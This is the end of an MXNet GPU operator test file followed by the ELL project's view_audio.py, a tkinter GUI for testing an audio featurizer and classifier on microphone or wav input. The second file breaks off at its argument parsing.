assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), {'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
@pytest.mark.serial
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
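# Build a row_sparse array on the CPU from data/indices taken from a default-context sparse
# matrix and verify the stype, contents, and that a copy made with mx.nd.array matches.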
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
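# Compare BilinearSampler on CPU (reference), GPU with cudnn_off=True, and GPU with cuDNN for
# forward and backward under grad_req 'write', 'add', and mixed 'write'/'null' settings.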
@with_seed()
@pytest.mark.serial
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] == 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] == 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym._bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@pytest.mark.skip(reason='skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@pytest.mark.skip(reason='skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : str(seg_sizes[0]),
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : str(seg_sizes[1]),
'MXNET_EXEC_BULK_EXEC_TRAIN' : str(seg_sizes[2])},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
@pytest.mark.serial
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
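# The math_* helpers below evaluate an elementwise op (log/erf/square) in the default (GPU)
# context and, when check_value is set, compare the result against the same op run on CPU.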
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z._simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
|
view_audio.py
|
#!/usr/bin/env python3
###################################################################################################
##
## Project: Embedded Learning Library (ELL)
## File: view_audio.py
## Authors: Chris Lovett, Chuck Jacobs
##
## Requires: Python 3.x
##
###################################################################################################
import argparse
import json
import math
import os
import time
from threading import Thread, Lock, get_ident
import sys
import wave
import tkinter as tk
from tkinter import BOTH, LEFT, RIGHT, TOP, BOTTOM, RAISED, X, N, END
from tkinter import Text
from tkinter.ttk import Frame, LabelFrame, Button, Style, Label, Entry
import numpy as np
import matplotlib
# Embedding matplotlib plots in tkinter views requires using the "TkAgg" backend
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
# local modules
import classifier
import featurizer
import microphone
import speaker
import wav_reader
class AudioDemo(Frame):
""" A demo application class that provides simple GUI for testing featurizer+classifier on
microphone or wav file input. """
def __init__(self, featurizer_model=None, classifier_model=None,
sample_rate=None, channels=None, input_device=None, categories=None,
image_width=80, ignore_label=None, threshold=None, wav_file=None, clear=5):
""" Initialize AudioDemo object
featurizer_model - the path to the compiled ELL featurizer
classifier_model - the path to the compiled ELL classifier
sample_rate - sample rate to featurizer is expecting
channels - number of channels featurizer is expecting
input_device - optional id of microphone to use
categories - path to file containing category labels
image_width - width of the spectrogram image
ignore_label - list of predictions to ignore (e.g. [0] ignores prediction 0)
threshold - ignore predictions that have confidence below this number (e.g. 0.5)
wav_file - optional wav_file to process when you click Play
clear - number of seconds before clearing the output window (default 5)
"""
super().__init__()
self.CLASSIFIER_MODEL_KEY = "classifier_model"
self.FEATURIZER_MODEL_KEY = "featurizer_model"
self.WAV_FILE_KEY = "wav_file"
self.CATEGORY_FILE_KEY = "categories"
self.get_settings_file_name()
self.load_settings()
self.reading_input = False
self.featurizer_model = None
if featurizer_model:
self.featurizer_model = featurizer_model
self.settings[self.FEATURIZER_MODEL_KEY] = featurizer_model
elif self.FEATURIZER_MODEL_KEY in self.settings:
self.featurizer_model = self.settings[self.FEATURIZER_MODEL_KEY]
self.classifier_model = None
if classifier_model:
self.classifier_model = classifier_model
self.settings[self.CLASSIFIER_MODEL_KEY] = classifier_model
elif self.CLASSIFIER_MODEL_KEY in self.settings:
self.classifier_model = self.settings[self.CLASSIFIER_MODEL_KEY]
self.wav_filename = wav_file
if self.wav_filename is None and self.WAV_FILE_KEY in self.settings:
self.wav_filename = self.settings[self.WAV_FILE_KEY]
self.wav_file_list = None
self.sample_rate = sample_rate if sample_rate is not None else 16000
self.channels = channels if channels is not None else 1
self.input_device = input_device
self.num_classifier_features = None
if not categories and self.CATEGORY_FILE_KEY in self.settings:
categories = self.settings[self.CATEGORY_FILE_KEY]
self.categories = categories
if categories:
self.settings[self.CATEGORY_FILE_KEY] = categories
self.save_settings() # in case we just changed it.
self.min_value = 0.0
self.max_value = 1.0
self.update_minmax = True
self.ignore_list = []
if ignore_label:
self.ignore_list = [ ignore_label ]
self.threshold = threshold
self.output_clear_time = int(clear * 1000) if clear else 5000
self.featurizer = None
self.classifier = None
self.wav_file = None
self.speaker = None
self.microphone = None
self.animation = None
self.show_spectrogram = True
self.colormap_name = "plasma"
self.show_classifier_output = True
self.last_prediction = None
self.probability = 0
# Threads
self.read_input_thread = None
self.lock = Lock()
self.main_thread = get_ident()
self.message_queue = []
# UI components
self.max_spectrogram_width = image_width
self.features_entry = None
self.spectrogram_image = None
self.classifier_feature_data = None
self.spectrogram_image_data = None
self.init_ui()
if self.featurizer_model:
self.load_featurizer_model(os.path.abspath(self.featurizer_model))
else:
self.show_output("Please specify and load a feature model")
if self.classifier_model:
self.load_classifier(self.classifier_model)
self.setup_spectrogram_image()
else:
self.show_output("Please specify and load a classifier model")
def get_settings_file_name(self):
""" this app stores the various UI field values in a settings file in your temp folder
so you don't always have to specify the full command line options """
import tempfile
temp = tempfile.gettempdir()
self.settings_file_name = os.path.join(temp, "ELL", "Audio", "viewaudio.json")
def load_settings(self):
""" load the previously saved settings from disk, if any """
self.settings = {}
if os.path.isfile(self.settings_file_name):
with open(self.settings_file_name, "r") as f:
self.settings = json.load(f)
def save_settings(self):
""" save the current settings to disk """
settings_dir = os.path.dirname(self.settings_file_name)
if not os.path.isdir(settings_dir):
os.makedirs(settings_dir)
with open(self.settings_file_name, "w") as f:
f.write(json.dumps(self.settings))
def load_featurizer_model(self, featurizer_model):
""" load the given compiled ELL featurizer for use in processing subsequent audio input """
if featurizer_model:
self.featurizer = featurizer.AudioTransform(featurizer_model, 40)
self.setup_spectrogram_image()
self.show_output("Feature input size: {}, output size: {}".format(
self.featurizer.input_size,
self.featurizer.output_size))
if self.features_entry.get() != featurizer_model:
self.features_entry.delete(0, END)
self.features_entry.insert(0, featurizer_model)
self.init_data()
def load_classifier(self, classifier_path):
""" load the given compiled ELL classifier for use in processing subsequent audio input """
if classifier_path:
self.classifier = classifier.AudioClassifier(classifier_path, self.categories,
self.ignore_list, self.threshold)
self.show_output("Classifier input size: {}, output size: {}".format(
self.classifier.input_size,
self.classifier.output_size))
if self.classifier_entry.get() != classifier_path:
self.classifier_entry.delete(0, END)
self.classifier_entry.insert(0, classifier_path)
self.init_data()
def init_data(self):
""" initialize the spectrogram_image_data and classifier_feature_data based on the newly loaded model info """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
if self.spectrogram_image is not None:
self.spectrogram_image.set_data(self.spectrogram_image_data)
if self.classifier:
self.num_classifier_features = self.classifier.input_size // self.featurizer.output_size
dim = (self.num_classifier_features, self.featurizer.output_size)
self.classifier_feature_data = np.zeros(dim, dtype=float)
def accumulate_feature(self, feature_data):
""" accumulate the feature data and pass feature data to classifier """
if self.classifier and self.show_classifier_output:
self.classifier_feature_data = np.vstack((self.classifier_feature_data,
feature_data))[-self.num_classifier_features:,:]
self.evaluate_classifier()
def accumulate_spectrogram_image(self, feature_data):
""" accumulate the feature data into the spectrogram image """
image_data = self.spectrogram_image_data
feature_data = np.reshape(feature_data, [-1,1])
new_image = np.hstack((image_data, feature_data))[:,-image_data.shape[1]:]
image_data[:,:] = new_image
def set_spectrogram_image(self):
""" update the spectrogram image and the min/max values """
self.lock.acquire() # protect access to the shared state
if self.update_minmax and self.show_spectrogram:
min_value = np.min(self.spectrogram_image_data)
max_value = np.max(self.spectrogram_image_data)
if np.isfinite(min_value) and np.isfinite(max_value):
self.min_value = min_value
self.max_value = max_value
eps = 0.1
if self.max_value - self.min_value < eps:
self.max_value = self.min_value + eps
self.spectrogram_image.set_clim(self.min_value, self.max_value)
self.spectrogram_image.set_data(self.spectrogram_image_data)
self.lock.release()
def get_correct_shape(self, shape):
""" for some reason keras stores input shape as (None,80,40), and numpy hates that
so we have to change this to (1,80,40) """
shape = list(shape)
fix = [x if x else 1 for x in shape]
return tuple(fix)
def clear_output(self):
""" remove some of the Output based a the timeout callback """
self.output_text.delete(1.0, 2.0)
def process_output(self):
""" show output that was queued by background thread """
self.lock.acquire()
messages = self.message_queue
self.message_queue = []
self.lock.release()
for msg in messages:
self.show_output(msg)
def show_output(self, message):
""" show output message, or queue it if we are on a background thread """
if self.main_thread != get_ident():
self.message_queue += [message]
return
for line in str(message).split('\n'):
self.output_text.insert(END, "{}\n".format(line))
self.output_text.see("end") # scroll to end
self.after(self.output_clear_time, self.clear_output)
def evaluate_classifier(self):
""" run the classifier model on the current feature data and show the prediction, if any """
if self.classifier and self.classifier_feature_data is not None:
prediction, probability, label = self.classifier.predict(self.classifier_feature_data.ravel())
if prediction is not None:
percent = int(100*probability)
if self.last_prediction != prediction or self.probability < probability:
self.last_prediction = prediction
self.probability = probability
self.show_output("<<< DETECTED ({}) {}% {} >>>".format(prediction, percent, label))
def start_playing(self, filename):
""" Play a wav file, and classify the audio. Note we use a background thread to read the
wav file and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the audio playback """
if self.speaker is None:
self.speaker = speaker.Speaker()
self.stop()
self.reading_input = False
self.wav_file = wav_reader.WavReader(self.sample_rate, self.channels)
self.wav_file.open(filename, self.featurizer.input_size, self.speaker)
def update_func(frame_index):
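# animation callback: flush any queued output messages, refresh the spectrogram image, and
# schedule on_stopped once the reader thread finishes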
self.process_output()
if not self.reading_input:
self.after(1, self.on_stopped)
self.set_spectrogram_image()
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and classify the audio.
self.featurizer.open(self.wav_file)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def start_recording(self):
""" Start recording audio from the microphone nd classify the audio. Note we use a background thread to
process the audio and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the microphone readings """
if self.microphone is None:
self.microphone = microphone.Microphone(False)
self.stop()
num_channels = 1
self.microphone.open(self.featurizer.input_size, self.sample_rate, num_channels, self.input_device)
def update_func(frame_index):
# this is an animation callback to update the UI every 33 milliseconds.
self.process_output()
self.set_spectrogram_image()
if not self.reading_input:
self.after(1, self.on_stopped)
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and classify the recorded audio.
self.featurizer.open(self.microphone)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def on_read_features(self):
""" this is the background thread entry point. So we read the feature data in a loop
and pass it to the classifier """
try:
while self.reading_input and self.featurizer:
feature_data = self.featurizer.read()
if feature_data is None:
break # eof
else:
self.lock.acquire()
self.accumulate_feature(feature_data)
if self.show_spectrogram:
self.accumulate_spectrogram_image(feature_data)
self.lock.release()
except:
errorType, value, traceback = sys.exc_info()
print("### Exception reading input: " + str(errorType) + ": " + str(value) + " " + str(traceback))
while traceback:
print(traceback.tb_frame.f_code)
traceback = traceback.tb_next
self.reading_input = False
def stop(self):
""" called when user clicks the stop button, or we reach the end of a wav file input """
# close streams
if self.animation:
self.animation.event_source.stop()
self.animation = None
if self.microphone:
self.microphone.close()
if self.speaker:
self.speaker.close()
if self.wav_file:
self.wav_file.close()
self.wav_file = None
self.reading_input = False
self.last_prediction = None
self.probability = 0
def on_rec_button_click(self):
""" called when user clicks the record button, same button is used to "stop" recording. """
if self.rec_button["text"] == "Rec":
self.rec_button["text"] = "Stop"
self.play_button["text"] = "Play"
self.start_recording()
else:
self.rec_button["text"] = "Rec"
self.on_stop()
def on_play_button_click(self):
""" called when user clicks the record button, same button is used to "stop" playback """
if self.play_button["text"] == "Play":
self.play_button["text"] = "Stop"
self.rec_button["text"] = "Rec"
self.on_play()
else:
self.play_button["text"] = "Play"
self.on_stop()
def on_play(self):
""" called when user clicks the Play button """
filename = self.wav_filename_entry.get()
filename = filename.strip('"')
self.wav_filename = filename
self.settings[self.WAV_FILE_KEY] = filename
self.save_settings()
self.start_playing(filename)
def on_stop(self):
""" called when user clicks the Stop button """
self.reading_input = False
if self.wav_file:
self.wav_file.close()
self.wav_file = None
if self.read_input_thread:
self.read_input_thread.join()
self.read_input_thread = None
self.stop()
def on_stopped(self):
""" called when we reach the end of the wav file playback """
self.play_button["text"] = "Play"
self.stop()
def get_wav_list(self):
if self.wav_filename and os.path.isfile(self.wav_filename):
dir_name = os.path.dirname(self.wav_filename)
if not self.wav_file_list:
self.wav_file_list = [x for x in os.listdir(dir_name) if os.path.splitext(x)[1] == ".wav"]
self.wav_file_list.sort()
return self.wav_file_list
def select_wav_file(self, filename):
self.wav_filename = filename
# show the file in the UI
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# and automatically play the file.
self.on_play()
def on_minus_key(self, event):
""" When user presses the plus button we reverse to the previous wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i - 1 >= 0:
next_wav_file = self.wav_file_list[i - 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def on_plus_key(self, event):
""" When user presses the plus button we advance to the next wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i + 1 < len(self.wav_file_list):
next_wav_file = self.wav_file_list[i + 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def init_ui(self):
""" setup the GUI for the app """
self.master.title("Test")
self.pack(fill=BOTH, expand=True)
# Input section
input_frame = LabelFrame(self, text="Input")
input_frame.bind("-", self.on_minus_key)
input_frame.bind("+", self.on_plus_key)
input_frame.pack(fill=X)
self.play_button = Button(input_frame, text="Play", command=self.on_play_button_click)
self.play_button.pack(side=RIGHT, padx=4)
self.rec_button = Button(input_frame, text="Rec", command=self.on_rec_button_click)
self.rec_button.pack(side=RIGHT, padx=4)
self.wav_filename_entry = Entry(input_frame, width=24)
self.wav_filename_entry.pack(fill=X)
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# Feature section
features_frame = LabelFrame(self, text="Features")
features_frame.pack(fill=X)
features_control_frame = Frame(features_frame)
features_control_frame.pack(fill=X)
load_features_button = Button(features_control_frame, text="Load", command=self.on_load_featurizer_model)
load_features_button.pack(side=RIGHT)
self.features_entry = Entry(features_control_frame, width=8)
self.features_entry.pack(fill=X)
self.features_entry.delete(0, END)
if self.featurizer_model:
self.features_entry.insert(0, self.featurizer_model)
viz_frame = Frame(features_frame)
viz_frame.pack(fill=X)
self.features_figure = Figure(figsize=(5, 4), dpi=100)
self.subplot = self.features_figure.add_subplot(111)
canvas = FigureCanvasTkAgg(self.features_figure, master=viz_frame)
canvas.draw()
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=True)
# Classifier section
classifier_frame = LabelFrame(self, text="Classifier")
classifier_frame.pack(fill=X)
load_classifier_button = Button(classifier_frame, text="Load", command=self.on_load_classifier)
load_classifier_button.pack(side=RIGHT)
self.classifier_entry = Entry(classifier_frame, width=8)
self.classifier_entry.pack(fill=X)
self.classifier_entry.delete(0, END)
if self.classifier_model:
self.classifier_entry.insert(0, self.classifier_model)
# Output section
output_frame = LabelFrame(self, text="Output")
output_frame.pack(fill=BOTH, expand=True)
self.output_text = Text(output_frame)
self.output_text.pack(fill=BOTH, padx=4, expand=True)
def setup_spectrogram_image(self):
""" this need to be called if you load a new feature model, because the featurizer output size might have
changed. """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
self.subplot.clear()
self.spectrogram_image = self.subplot.imshow(self.spectrogram_image_data, vmin=self.min_value,
vmax=self.max_value, origin="lower", animated=True, cmap=pyplot.get_cmap(self.colormap_name))
def on_load_featurizer_model(self):
""" called when user clicks the Load button for the feature model """
filename = self.features_entry.get()
filename = filename.strip('"')
self.settings[self.FEATURIZER_MODEL_KEY] = filename
self.save_settings()
self.stop()
self.load_featurizer_model(filename)
def on_load_classifier(self):
""" called when user clicks the Load button for the feature model """
self.classifier_model = self.classifier_entry.get()
self.settings[self.CLASSIFIER_MODEL_KEY] = self.classifier_model
self.save_settings()
self.stop()
self.load_classifier(self.classifier_model)
def main(featurizer_model=None, classifier=None, sample_rate=None, channels=None, input_device=None, categories=None,
image_width=80, ignore_label=None, threshold=None, wav_file=None, clear=5):
""" Main function to create root UI and AudioDemo object, then run the main UI loop """
root = tk.Tk()
root.geometry("800x800")
app = AudioDemo(featurizer_model, classifier, sample_rate, channels, input_device, categories, image_width,
ignore_label, threshold, wav_file, clear)
root.bind("+", app.on_plus_key)
root.bind("-", app.on_minus_key)
while True:
try:
root.mainloop()
break
except UnicodeDecodeError:
pass
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Test a feature model and optional classifier in a handy GUI app")
# options
